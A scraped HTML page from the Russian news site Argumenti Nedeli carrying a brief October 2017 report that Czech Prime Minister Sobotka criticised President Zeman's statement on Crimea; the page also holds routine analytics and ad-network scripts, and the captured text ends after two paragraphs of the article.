<!DOCTYPE html>
<html>
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta name='yandex-verification' content='57463a260b82b280' />
	<meta name="google-site-verification" content="tossbk_I2eb3-RB8DxVbAUYPewK5KDyj6bnrnKC8-eU" />
	<meta name="mailru-verification" content="1505d3c11701cb6c" />
	<meta name="dumedia-verify" content="df31ef70be34">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
	<meta name="757a66e838ed83d5840779983391e519" content="">
	<title>Премьер-министр Чехии раскритиковал заявление Земана о Крыме - Аргументы Недели</title><meta name="description" content="Ранее чешский президент Милош Земан, выступая в ПАСЕ, назвал потерю Крыма Украиной завершенным делом. Земан предложил Москве выплатить Киеву компенсацию за вошедший в состав России полуостров. "><meta name="twitter:title" content="Премьер-министр Чехии раскритиковал заявление Земана о Крыме - Аргументы Недели"><meta name="twitter:image" content="http://argumenti.ru/images/arhnews/551959.jpg"><meta name="og:title" content="Премьер-министр Чехии раскритиковал заявление Земана о Крыме - Аргументы Недели"><meta name="og:description" content="Ранее чешский президент Милош Земан, выступая в ПАСЕ, назвал потерю Крыма Украиной завершенным делом. Земан предложил Москве выплатить Киеву компенсацию за вошедший в состав России полуостров. "><meta name="og:image" content="http://argumenti.ru/images/arhnews/551959.jpg"><link rel="stylesheet" href="http://argumenti.ru/pub/styles/reset.css" type="text/css"><link rel="stylesheet" href="http://argumenti.ru/pub/styles/mainv.css?ver=67" type="text/css"><link rel="stylesheet" href="http://argumenti.ru/mistakes/static/mistakes.css" type="text/css"><link rel="image_src" href="http://argumenti.ru/images/arhnews/551959.jpg" >	<//base href="http://argumenti.ru/" />
		<link rel="amphtml" href="http://argumenti.ru/world/2017/10/551959/amp">
			    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">

	<link title="argumenti_ru" type="application/rss+xml" rel="alternate" href="http://www.argumenti.ru/rss/argumenti_online.xml"/>
	<link rel="icon" type="image/ico" href="http://argumenti.ru/favicon.ico" />
	<link rel="icon" type="image/png" href="http://argumenti.ru/favicon.png">
	<link rel="apple-touch-icon" href="http://www.argumenti.ru/pub/images/apple-touch-icon-iphone.png" />
	<link rel="apple-touch-icon" sizes="72x72" href="http://www.argumenti.ru/pub/images/apple-touch-icon-ipad.png" />
	<link rel="apple-touch-icon" sizes="114x114" href="http://www.argumenti.ru/pub/images/apple-touch-icon-iphone4.png" />
	<link rel="apple-touch-icon" sizes="144x144" href="http://www.argumenti.ru/pub/images/apple-touch-icon-ipad3.png" />

		



	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/argumenti_21.js?ver=4"></script>
	<script language="JavaScript" src="http://argumenti.ru/mistakes/static/mistakes_2.js"></script>
	<script type="text/javascript" src="http://argumenti.ru/pub/js/jdropdowns/jquery.dropdownPlain.js"></script>
	<script type="text/javascript" src="http://argumentiru.com/pub/js/jscroller-0.4.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/jquery.jcarousel.min.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/jquery.validate.min.js"></script>
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js"></script>
    <script type="text/javascript" src="http://argumenti.ru/pub/js/tinycarusel.js"></script>
<script type="text/javascript" src="http://argumentiru.com/pub/js/adfox.asyn.code.scroll/adfox.asyn.code.ver3.js"></script>
		<script type="text/javascript" src="http://argumentiru.com/pub/js/adfox.asyn.code.scroll/adfox.asyn.code.scroll.js"> </script>
<!-- Put this script tag to the <head> of your page -->
<script type="text/javascript" src="https://vk.com/js/api/share.js?94" charset="windows-1251"></script>
<script id="my-widget-script" async
        src="https://likemore-go.imgsmail.ru/widget.js"
        data-uid="9f8d155b17e468abed8b96495fb48897">
</script>
	</head>

			<body>
	
<!-- create page: 10:10:31 10.11.17 -->

<!-- Yandex.Metrika counter  ONLINE -->
<script type="text/javascript">
(function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter26004090 = new Ya.Metrika({id:26004090,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true});
        } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
        s = d.createElement("script"),
        f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/javascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

    if (w.opera == "[object Opera]") {
        d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
})(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="//mc.yandex.ru/watch/26004090" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!--Desktop--!>
<!-- Rating@Mail.ru counter -->
<script type="text/javascript">
var _tmr = window._tmr || (window._tmr = []);
_tmr.push({id: "2828898", type: "pageView", start: (new Date()).getTime()});
(function (d, w, id) {
  if (d.getElementById(id)) return;
  var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true; ts.id = id;
  ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
  var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
  if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window, "topmailru-code");
</script><noscript><div style="position:absolute;left:-10000px;">
<img src="//top-fwz1.mail.ru/counter?id=2828898;js=na" style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter --><header>
<nav>
<div class="menu_wrapper">
<div class="menuToggle"><i class="fa fa-bars" aria-hidden="true"></i></div>
	<ul id="dropdown" class="dropdown">
	    <li class="mob_hidden"><a href="http://argumenti.ru/?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">Главная страница</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/live?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">АН LIVE</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/an?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">Скачать «Аргументы Недели»</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/charity?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">Сможем вместе</a></li>
		<li class="mob_hidden"><a href="http://knigi-an.ru" target="_blank" rel="nofollow">Книги «АН»</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/allbooks?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu" target="_blank" rel="nofollow">Книги pdf</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/complanes?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">Книга жалоб</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/udobreniya?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">Биоклад</a></li>
		<li class="mob_hidden up_bars"><i class="fa fa-bars" aria-hidden="true"></i></li>
		<div class="dropmenu">
		<ul>
			<li><a href="http://argumenti.ru/social?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Соцпакет</a></li>
			<li><a href="http://argumenti.ru/pravoved?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Правовед</a></li>
			<li><a href="http://argumenti.ru/gorodm?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Город&nbsp;М</a></li>
			<li><a href="http://argumenti.ru/earth?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu"><nobr>Сад-огород</nobr></a></li>
			<li><a href="http://argumenti.ru/espionage?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Шпионаж</a></li>
			<li><a href="http://argumenti.ru/crime?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Криминал</a></li>
			<li><a href="http://argumenti.ru/culture?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Культура</a></li>
			<li><a href="http://argumenti.ru/health?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Здоровье</a></li>
			<li><a href="http://argumenti.ru/history?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">История</a></li>
			<li><a href="http://argumenti.ru/education?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Образование</a></li>
			<li><a href="http://argumenti.ru/army?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Армия</a></li>
			<li><a href="http://argumenti.ru/hitech?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Хайтек</a></li>
			<li style="border-bottom: none!important;"><a href="http://argumenti.ru/scandal?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Скандал</a></li>
			<li class="drop_sub">Регионы</li>
			<li><a href="http://argumenti.ru/region/spb">АН - CПб</a></li>
			<li><a href="http://an-crimea.ru/" rel='nofollow'>АН - Крым</a></li>
			<li><a href="http://argumenti.ru/region/ekb">АН - Екб</a></li>		</ul>
		</div>
	</ul>
	<ul id="dropdown" class="dropdown desc_hidden">
		<li><a href="http://argumenti.ru">Главная</a></li>
		<li><a href="http://argumenti.ru/live">АН LIVE</a></li>
		<li><a href="http://argumenti.ru/news">Все новости</a></li>
	    <li class="submenu_name">Рубрики</li>
		<li><a href="http://argumenti.ru/politics">Политика</a></li>
		<li><a href="http://argumenti.ru/economics">Экономика</a></li>
		<li><a href="http://argumenti.ru/society">Общество</a></li>
		<li><a href="http://argumenti.ru/world">В мире</a></li>
		<li><a href="http://argumenti.ru/social">Соцпакет</a></li>
		<li><a href="http://argumenti.ru/pravoved">Правовед</a></li>
		<li><a href="http://argumenti.ru/rassledovanie">Расследования</a></li>
		<li><a href="http://argumenti.ru/hitech">Хайтек</a></li>
		<li><a href="http://argumenti.ru/gorodm">Город&nbsp;М</a></li>
		<li><a href="http://argumenti.ru/earth"><nobr>Сад-огород</nobr></a></li>
		<li><a href="http://argumenti.ru/espionage">Шпионаж</a></li>
		<li><a href="http://argumenti.ru/scandal">Скандал</a></li>
		<li><a href="http://argumenti.ru/sport">Спорт</a></li>
		<li><a href="http://argumenti.ru/crime">Криминал</a></li>
		<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
		<li><a href="http://argumenti.ru/health">Здоровье</a></li>
		<li><a href="http://argumenti.ru/history">История</a></li>
		<li><a href="http://argumenti.ru/education">Образование</a></li>
		<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
		<li><a href="http://argumenti.ru/army">Армия</a></li>
	</ul>	
</div>
</nav>
<div id="star">
			<ul>
																								<li id="75386">
																<a href="http://argumenti.ru/world/2017/10/551866?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/5a2a903f67b30d7f69daa0b6fd5664fa.jpg" width="160" height="110" alt="Минобороны заявило о полном уничтожении экономической инфраструктуры ИГ в Сирии" />
																					<p>Минобороны заявило о полном уничтожении экономической инфраструктуры ИГ в Сирии</p></a>	
						</li>

																								<li id="75390" >
																								<a href="http://argumenti.ru/politics/2017/10/551870?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/e18840e15fbd189ee4ca936a097754ea.jpg" width="160" height="110" alt="В Госдуме призвали отказаться от иллюзий в отношении политики Эрдогана" />
																<p>В Госдуме призвали отказаться от иллюзий в отношении политики Эрдогана</p></a>
								
						</li>
																									<li id="75403">
																<a href="http://argumenti.ru/politics/2017/10/551938?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/58e4769dc9cbf1c2a2685324907cb828.jpg" width="160" height="110" alt="Бывший начальник Главного штаба РВСН оценил возможности КНДР ударить по США" />
																					<p>Бывший начальник Главного штаба РВСН оценил возможности КНДР ударить по США</p></a>	
						</li>

												</ul>
		</div></header>
        
<div class="container">
	<div class="content">
		<!-- логотип -->

		<div id="corp">
							<a href="http://argumenti.ru/" id="an_logo"><img alt="Аргументы Недели (argumenti.ru)" src="http://www.argumenti.ru/images/argumenti/AN2.gif"/></a>
					<div id="search_time">

																<a href="http://argumenti.ru/an"><div class="newnum2"></div></a>
								


<div class="ya-site-form ya-site-form_inited_no" onclick="return {'action':'http://argumenti.ru/search','arrow':false,'bg':'transparent','fontsize':12,'fg':'#000000','language':'ru','logo':'rb','publicname':'Yandex Site Search #2186328','suggest':true,'tld':'ru','type':2,'usebigdictionary':true,'searchid':2186328,'webopt':false,'websearch':false,'input_fg':'#000000','input_bg':'#ffffff','input_fontStyle':'normal','input_fontWeight':'normal','input_placeholder':'Поиск...','input_placeholderColor':'#000000','input_borderColor':'#7f9db9'}">
	<form action="http://yandex.ru/sitesearch" method="get" target="_blank">
		<input type="hidden" name="searchid" value="2186328"/>
		<input type="hidden" name="l10n" value="ru"/>
		<input type="hidden" name="reqenc" value=""/>
		<input type="search" name="text" value=""/>
		<input type="submit" value="Найти"/>
	</form></div><style type="text/css">.ya-page_js_yes .ya-site-form_inited_no { display: none; }</style><script type="text/javascript">(function(w,d,c){var s=d.createElement('script'),h=d.getElementsByTagName('script')[0],e=d.documentElement;if((' '+e.className+' ').indexOf(' ya-page_js_yes ')===-1){e.className+=' ya-page_js_yes';}s.type='text/javascript';s.async=true;s.charset='utf-8';s.src=(d.location.protocol==='https:'?'https:':'http:')+'//site.yandex.net/v2.0/js/all.js';h.parentNode.insertBefore(s,h);(w[c]||(w[c]=[])).push(function(){Ya.Site.Form.init()})})(window,document,'yandex_site_callbacks');</script>

	</div>
		<div class="soc_reg">

            <ul id="socnets" style="width:100%">
				<li><a class="vk" target="_blank" href="http://vkontakte.ru/club14409962" rel="nofollow"></a></li>
				<li><a class="tw" target="_blank" href="http://twitter.com/argumenti" rel="nofollow"></a></li>
				<li><a class="fb" target="_blank" href="https://www.facebook.com/argumentinedeli" rel="nofollow"></a></li>
				<li><a class="mt2" target="_blank" href="http://argumenti.mirtesen.ru/" rel="nofollow"></a></li>
				<li><a class="ok" target="_blank" href="http://www.odnoklassniki.ru/argumenti" rel="nofollow"></a></li>
			</ul>


			<div id="parts">
		<select id="Regions" onchange="window.location.href=this.options[this.selectedIndex].value">
			<option value="">Регион</option>
			<option value="http://argumenti.ru/">Вся Россия</option>
								
				<option value="http://argumenti.ru/region/altay">Алтайский край</option>
								
				<option value="http://argumenti.ru/region/baltiya">Балтия</option>
								
				<option value="http://argumenti.ru/region/belrus">Белоруссия</option>
								
				<option value="http://argumenti.ru/region/vladivostok">Владивосток</option>
								
				<option value="http://argumenti.ru/region/volgograd">Волгоград</option>
								
				<option value="http://argumenti.ru/region/vyatka">Вятка</option>
								
				<option value="http://argumenti.ru/region/ekb">Екатеринбург</option>
								
				<option value="http://argumenti.ru/region/irkutsk">Иркутск</option>
								
				<option value="http://argumenti.ru/region/kamchatka">Камчатка</option>
								
				<option value="http://argumenti.ru/region/krasnoyarsk">Красноярск</option>
								
				<option value="http://an-crimea.ru/">Крым</option>
								
				<option value="http://argumenti.ru/region/kursk">Курск</option>
								
				<option value="http://argumenti.kg/">Кыргызстан</option>
								
				<option value="http://argumenti.ru/region/lipetsk">Липецк</option>
								
				<option value="http://argumenti.ru/region/murmansk">Мурманск</option>
								
				<option value="http://argumenti.ru/region/novosib">Новосибирск</option>
								
				<option value="http://argumenti.ru/region/orel">Орел</option>
								
				<option value="http://argumenti.ru/region/penza">Пенза</option>
								
				<option value="http://argumenti.ru/region/perm">Пермь</option>
								
				<option value="http://argumenti.ru/region/petrozavodsk">Петрозаводск</option>
								
				<option value="http://argumenti.ru/region/petropavlovsk">Петропавловск-К</option>
								
				<option value="http://argumenti.ru/region/spb">Санкт-Петербург</option>
								
				<option value="http://argumenti.ru/region/sakhlin">Сахалин</option>
								
				<option value="http://argumenti.ru/region/kavkaz">Северный Кавказ</option>
								
				<option value="http://argumenti.ru/region/tatarstan">Татарстан</option>
								
				<option value="http://argumenti.ru/region/tver">Тверь</option>
								
				<option value="http://argumenti.ru/region/ural">Урал</option>
								
				<option value="http://argumenti.ru/region/chelyabinsk">Челябинск</option>
								
				<option value="http://argumenti.ru/region/yakutsk">Якутск</option>
								
				<option value="http://argumenti.ru/region/yaroslavl">Ярославль</option>
				
		</select>
	</div>        </div>

		</div>

		<div class="new_corp">
								<div id="menus">
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/politics?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Политика</a></li>
			<li><a href="http://argumenti.ru/economics?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Экономика</a></li>
			<li><a href="http://argumenti.ru/society?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Общество</a></li>
			<li><a href="http://argumenti.ru/world?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">В мире</a></li>			
			<li><a href="http://argumenti.ru/showbiz?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium"><nobr>Шоубиз</nobr></a></li>
			<li><a href="http://argumenti.ru/sport?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Спорт</a></li>
			<li><a href="http://argumenti.ru/rassledovanie?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Расследования</a></li>
			<li><a href="http://argumenti.ru/tourism?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Туризм</a></li>
			<li><a href="http://argumenti.ru/culture?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Культура</a></li>
		</ul>
</div>
		<!-- Rating@Mail.ru counter -->
<script type="text/javascript">//<![CDATA[
var _tmr = _tmr || [];
_tmr.push({id: "1069168", type: "pageView", start: (new Date()).getTime()});
(function (d, w) {
   var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true;
   ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
   var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
   if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window);
//]]></script><noscript><div style="position:absolute;left:-10000px;">
<img src="//top-fwz1.mail.ru/counter?id=1069168;js=na" style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter -->

		</div>


			<div id="left">

		
		
			<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(50615, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "vertical",
            border_type: "block",
            limit: 4,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            header_bg_color: "FEEAC7",
            bg_color: "EEEEEE",
            border_color: "FBE5C0",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            sitelinks_color: "0000CC",
            favicon: true,
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script>

		<div id="titules" style="margin-bottom: 4px;">
		
	<a href="http://argumenti.ru/an">

	<img src="http://argumenti.ru/images/preview/price/c1372e2abd9e4370e5d648a94eaa7b1e.jpg" alt="Аргументы Недели. 39(581) от 5.10.2017 ">		
	</a>

		
	</div>

	<!-- подменю -->
	<ul id="corpmenu">
		<li><a href="http://argumenti.ru/an">Скачать «Аргументы Недели»</a></li>
		<li><a href="http://www.argumenti.ru/reklama/internet.html">Реклама в «АН»</a></li>
		<li><a href="http://argumenti.ru/subscript">Подписка на газету</a></li>
	
	</ul>


	<script language="JavaScript" type="text/javascript">
		function NewRegion() {
			region_url = $('#Regions option:selected').val();
			if (region_url !='')
				window.location = region_url;
		}
	</script>		


<!-- Крупные preview -->
<!-- По умолчанию -->
		<noindex>
	<h2 class="namerub"><span class="rem">//</span>НАШИ ПАРТНЕРЫ</h2>
	<h2 class="namerub"><span class="rem">//</span>Новости</h2>
<div id="smi2adblock_76450"><a href="http://net.finam.ru/" rel="nofollow">Новости net.finam.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.net.finam.ru/data/js/76450.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>

<!--  
<h2 class="namerub"><span class="rem">//</span>События/Афиша</h2>
<a href="http://m-g-t.ru/performance/vysotskij-rozhdenie-legendy" rel="nofollow">
<img src="http://argumenti.ru/pub/images/partners/696.gif" width="240" height="240" alt="vysotskij-rozhdenie-legendy"  border="0" /></a>
-->



	<!-- ex_adv 44 --><a href="" alt="" target="_blank" rel="nofollow"><img src="http://www.argumenti.ru/images/partners/524.gif" width="240" height="100"></a>	
	</noindex>
			
	
					<h4 class="namerub"><span class="rem">//</span>Сад и огород</h4>
		<ul class="minf_anons">
							<li><a href="http://argumenti.ru/ad_informer/click/71124" target="_blank"><img src="http://argumenti.ru/images/preview/tabloid/064d2f72276b642e6beffaffe656d0d9.jpg" width="70" height="70" alt="Биоклад"  border="0" /><div class="inf_txt">Советы по посадке картофеля</div></a></li>	
							<li><a href="http://argumenti.ru/ad_informer/click/71442" target="_blank"><img src="http://argumenti.ru/images/preview/tabloid/b507e17e2ea914d0e5f3374bcea75a13.jpg" width="70" height="70" alt="Биоклад"  border="0" /><div class="inf_txt">Агротехника фасоли и бобов</div></a></li>	
					</ul>
	
	
		
		
	<h2 class="namerub"><span class="rem">//</span>Новости MarketGid</h2>
<!-- MarketGidComposite Start -->
<div id="MarketGidScriptRootC39254">
<div id="MarketGidPreloadC39254">
<a id="mg_add39254" href="http://usr.marketgid.com/demo/goods/" target="_blank" rel="nofollow">Добавить свое объявление</a><br> <a href="http://marketgid.com/" target="_blank" rel="nofollow">Загрузка...</a> 
</div>
<script> 
(function(){
var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootC39254")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><body></body></ht"+"ml>");iw.close();var c=iw[b];}
catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootC39254");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=39254;c[ac](dv);
var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="http://jsc.dt00.net/n/e/news.argumenti.ru.39254.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
</script>
</div>
<!-- MarketGidComposite End -->





<h2 class="namerub"><span class="rem">//</span>новости 24СМИ</h2>
<div id="smi_teaser_2695">
    <center>
        <a href="https://24smi.info/?utm_source=informer_2695" rel="nofollow">
            Агрегатор новостей 24СМИ
        </a>
    </center>
</div>

<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/d/b/2695.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>




<div id="smi2adblock_81550"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//js.advert.mirtesen.ru/data/js/81550.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>






	<div>
	

			

<a href="https://podpiska.pochta.ru/press/%D0%9F1029" rel="nofollow">
<img src="http://argumenti.ru/pub/images/partners/705.jpg" width="240" height="400" alt="podpiska-pochta" border="0" /></a>
<div id="unit_83036"><a href="http://smi2.net/" rel="nofollow">Новости СМИ2</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//news.smi2.ru/data/js/83036.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>



	</div>

		
	<h4 class="namerub"><span class="rem">//</span>Поп-новости</h4>
<ul class="main_inf_anons">
			<li>
							<a href="http://argumenti.ru/showbiz/2017/10/551970">
					<img src="http://argumenti.ru/images/preview/arhnews/76bff2c530df9486f9c52dc436791905.jpeg" alt="Ольга Бузова оскорбила своих обидчиков" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2017/10/551970" style="font-size:1.05em;">Ольга Бузова оскорбила своих обидчиков</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2017/10/551952">
					<img src="http://argumenti.ru/images/preview/arhnews/9390f00f97178f12110d6a422974001b.jpg" alt="Две звезды Голливуда рассказали о домогательствах продюсера Вайнштейна" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2017/10/551952" style="font-size:1.05em;">Две звезды Голливуда рассказали о домогательствах продюсера Вайнштейна</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2017/10/551946">
					<img src="http://argumenti.ru/images/preview/arhnews/1000cb7a698dffa3edc936643e2a0694.jpg" alt="Солистка &quot;Блестящих&quot; вышла замуж и стала мамой" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2017/10/551946" style="font-size:1.05em;">Солистка &quot;Блестящих&quot; вышла замуж и стала мамой</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2017/10/551941">
					<img src="http://argumenti.ru/images/preview/arhnews/fe94053f1ef15665d74a444a5cc64416.jpeg" alt="Фанаты осудили Викторию Лопыреву за внешний вид в ОАЭ" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2017/10/551941" style="font-size:1.05em;">Фанаты осудили Викторию Лопыреву за внешний вид в ОАЭ</a>
		</li>
	</ul>	<h2 class="namerub"><span class="rem">//</span>Новости news.net.finam.ru</h2>
<div id="smi2adblock_68993"><a href="http://finance.comon.ru/" rel="nofollow">Новости finance.comon.ru</a></div>
<script async type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.finance.comon.ru/data/js/68993.js'; sc.charset = 'windows-1251';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>



				
	<div id="block__fix-adv">
				
	</div>

		
<!--<h4 class="namerub"><span class="rem">//</span>Наши партнеры</h4>-->


</div>	
		<section id="center">

			<!-- your device: Desktop -->


					<!--noindex-->

	<ul id="topanons">
					<li><span class="news_time">10:29</span><a href="http://argumenti.ru/world/2017/10/551974?utm_source=argumenti.ru&utm_medium=news&utm_campaign=anons">Недовольная украинским законом об образовании Венгрия пригрозила Киеву санкциями</a></li>
					<li><span class="news_time">10:09</span><a href="http://argumenti.ru/world/2017/10/551972?utm_source=argumenti.ru&utm_medium=news&utm_campaign=anons">В базу данных украинского сайта &quot;Миротворец&quot; попала артистка Надежда Бабкина</a></li>
					<li><span class="news_time">09:36</span><a href="http://argumenti.ru/world/2017/10/551968?utm_source=argumenti.ru&utm_medium=news&utm_campaign=anons">СМИ узнали причину гибели Су-24 в Сирии</a></li>
					<li><span class="news_time">09:13</span><a href="http://argumenti.ru/world/2017/10/551966?utm_source=argumenti.ru&utm_medium=news&utm_campaign=anons">Подозреваемая в убийстве брата Ким Чен Ына &quot;тренировалась&quot; на другом мужчине</a></li>
					<li><span class="news_time">08:50</span><a href="http://argumenti.ru/world/2017/10/551964?utm_source=argumenti.ru&utm_medium=news&utm_campaign=anons">Савченко допустила силовой вариант возвращения Крыма под контроль Украины</a></li>
				<li class="news_arh">
							<a href="http://argumenti.ru/world/news?utm_source=argumenti.ru&utm_medium=news&utm_campaign=anons">В мире</a> /
						<a href="http://argumenti.ru/news" style="font-size:1.2em">Все новости >></a>

		</li>
	</ul>

	<!--/noindex-->		
			<p class="namerub">
			<span class="rem">//</span><a href="http://argumenti.ru/world">В мире</a>
						<span class="agecategory">
									13+
							</span>
		</p>
	
	<article>
	<h1>Премьер-министр Чехии раскритиковал заявление Земана о Крыме</h1>
	
				<p class="info">
					<span class="number_info">

						



													11&nbsp;октября&nbsp;2017,&nbsp;07:31																			[&nbsp;«Аргументы Недели»&nbsp;]
						
					</span>
				</p>
				<div class="publtxt">
																		<figure id="publ_photo">
																<img src="http://argumenti.ru/images/preview/arhnews/87ae05719ce7b2832cb0eccbdc85f56a.jpg" alt="Премьер-министр Чехии раскритиковал заявление Земана о Крыме" />
																									<figcaption>фото: globallookpress.com</figcaption>
															</figure>
											

												<div></div>
					
																<div><p><strong>Глава правительства Чехии Богуслав Соботка подверг критике заявление президента этой страны, касающееся российского Крыма.</strong></p>
<p>Соботка разместил в своем микроблоге в Twitter запись, в которой отметил, что слова Милоша Земана противоречат внешнеполитическому курсу Праги. Премьер-министр добавил, что президента никто не уполномочивал делать подобные заявления.</p>
